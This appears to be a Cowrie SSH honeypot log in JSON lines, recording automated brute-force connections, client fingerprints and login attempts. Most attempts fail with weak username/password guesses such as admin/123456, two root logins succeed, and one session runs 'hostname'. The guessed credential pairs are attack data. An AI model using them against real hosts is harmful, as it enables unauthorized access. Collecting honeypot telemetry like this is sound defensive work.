{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:13:33.199559Z","src_ip":"212.227.125.160","session":"c2a71bacb52b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:13:34.984457Z","src_ip":"212.227.125.160","session":"c2a71bacb52b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:13:36.068060Z","src_ip":"212.227.125.160","session":"c2a71bacb52b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54770,"dst_ip":"1.2.3.4","dst_port":22,"session":"88d44b7013a2","protocol":"ssh","message":"New connection: 217.72.205.35:54770 (1.2.3.4:22) [session: 88d44b7013a2]","sensor":"my-vps","timestamp":"2025-08-31T00:14:20.384001Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:14:20.385253Z","src_ip":"217.72.205.35","session":"88d44b7013a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41424,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a67b435c3ab","protocol":"ssh","message":"New connection: 212.227.235.229:41424 (1.2.3.4:22) [session: 3a67b435c3ab]","sensor":"my-vps","timestamp":"2025-08-31T00:14:28.769886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:14:29.601513Z","src_ip":"212.227.235.229","session":"3a67b435c3ab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:14:29.603108Z","src_ip":"212.227.235.229","session":"3a67b435c3ab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:14:33.593855Z","src_ip":"212.227.235.229","session":"3a67b435c3ab"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:14:34.782703Z","src_ip":"212.227.235.229","session":"3a67b435c3ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38468,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc4ebd6e009","protocol":"ssh","message":"New connection: 212.227.235.229:38468 (1.2.3.4:22) [session: 4bc4ebd6e009]","sensor":"my-vps","timestamp":"2025-08-31T00:14:39.883572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:14:39.884559Z","src_ip":"212.227.235.229","session":"4bc4ebd6e009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:14:40.188530Z","src_ip":"212.227.235.229","session":"4bc4ebd6e009"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"1qaz2wsx3edc4rfv","message":"login attempt [jenkins/1qaz2wsx3edc4rfv] failed","sensor":"my-vps","timestamp":"2025-08-31T00:14:41.438233Z","src_ip":"212.227.235.229","session":"4bc4ebd6e009"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:14:42.743122Z","src_ip":"212.227.235.229","session":"4bc4ebd6e009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35780,"dst_ip":"1.2.3.4","dst_port":22,"session":"a15cfb63dba0","protocol":"ssh","message":"New connection: 212.227.125.160:35780 (1.2.3.4:22) [session: a15cfb63dba0]","sensor":"my-vps","timestamp":"2025-08-31T00:14:50.356999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:14:50.653874Z","src_ip":"212.227.125.160","session":"a15cfb63dba0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:14:50.654580Z","src_ip":"212.227.125.160","session":"a15cfb63dba0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:14:52.233942Z","src_ip":"212.227.125.160","session":"a15cfb63dba0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:14:53.822468Z","src_ip":"212.227.125.160","session":"a15cfb63dba0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38670,"dst_ip":"1.2.3.4","dst_port":22,"session":"dadd1fbdc1d3","protocol":"ssh","message":"New connection: 212.227.235.229:38670 (1.2.3.4:22) [session: dadd1fbdc1d3]","sensor":"my-vps","timestamp":"2025-08-31T00:15:44.368068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:15:45.226325Z","src_ip":"212.227.235.229","session":"dadd1fbdc1d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:15:45.227057Z","src_ip":"212.227.235.229","session":"dadd1fbdc1d3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:15:48.917142Z","src_ip":"212.227.235.229","session":"dadd1fbdc1d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59830,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b88d6d6c21f","protocol":"ssh","message":"New connection: 212.227.235.229:59830 (1.2.3.4:22) [session: 7b88d6d6c21f]","sensor":"my-vps","timestamp":"2025-08-31T00:15:49.120465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:15:49.121109Z","src_ip":"212.227.235.229","session":"7b88d6d6c21f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:15:49.421976Z","src_ip":"212.227.235.229","session":"7b88d6d6c21f"}
{"eventid":"cowrie.login.failed","username":"cammue","password":"cammue","message":"login attempt [cammue/cammue] failed","sensor":"my-vps","timestamp":"2025-08-31T00:15:50.658130Z","src_ip":"212.227.235.229","session":"7b88d6d6c21f"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:15:51.184120Z","src_ip":"212.227.235.229","session":"dadd1fbdc1d3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:15:51.959234Z","src_ip":"212.227.235.229","session":"7b88d6d6c21f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad1ba446234b","protocol":"ssh","message":"New connection: 212.227.125.160:59990 (1.2.3.4:22) [session: ad1ba446234b]","sensor":"my-vps","timestamp":"2025-08-31T00:16:05.829796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:16:06.060932Z","src_ip":"212.227.125.160","session":"ad1ba446234b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:16:06.062199Z","src_ip":"212.227.125.160","session":"ad1ba446234b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:16:07.365500Z","src_ip":"212.227.125.160","session":"ad1ba446234b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:08.584196Z","src_ip":"212.227.125.160","session":"ad1ba446234b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36022,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9980f9cb624","protocol":"ssh","message":"New connection: 212.227.125.160:36022 (1.2.3.4:22) [session: d9980f9cb624]","sensor":"my-vps","timestamp":"2025-08-31T00:16:24.762858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:16:26.122939Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:16:26.126951Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.login.success","username":"root","password":"060277","message":"login attempt [root/060277] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:16:32.054419Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:16:34.364769Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T00:16:34.365573Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:35.550985Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:35.552197Z","src_ip":"212.227.125.160","session":"d9980f9cb624"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":51852,"dst_ip":"1.2.3.4","dst_port":22,"session":"41bcd134092d","protocol":"ssh","message":"New connection: 201.148.180.50:51852 (1.2.3.4:22) [session: 41bcd134092d]","sensor":"my-vps","timestamp":"2025-08-31T00:16:44.311527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:16:45.386882Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:16:45.388985Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40664,"dst_ip":"1.2.3.4","dst_port":22,"session":"3daf15ae706c","protocol":"ssh","message":"New connection: 212.227.235.229:40664 (1.2.3.4:22) [session: 3daf15ae706c]","sensor":"my-vps","timestamp":"2025-08-31T00:16:50.199549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:16:50.200444Z","src_ip":"212.227.235.229","session":"3daf15ae706c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:16:50.506408Z","src_ip":"212.227.235.229","session":"3daf15ae706c"}
{"eventid":"cowrie.login.success","username":"root","password":"060277","message":"login attempt [root/060277] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:16:51.234856Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
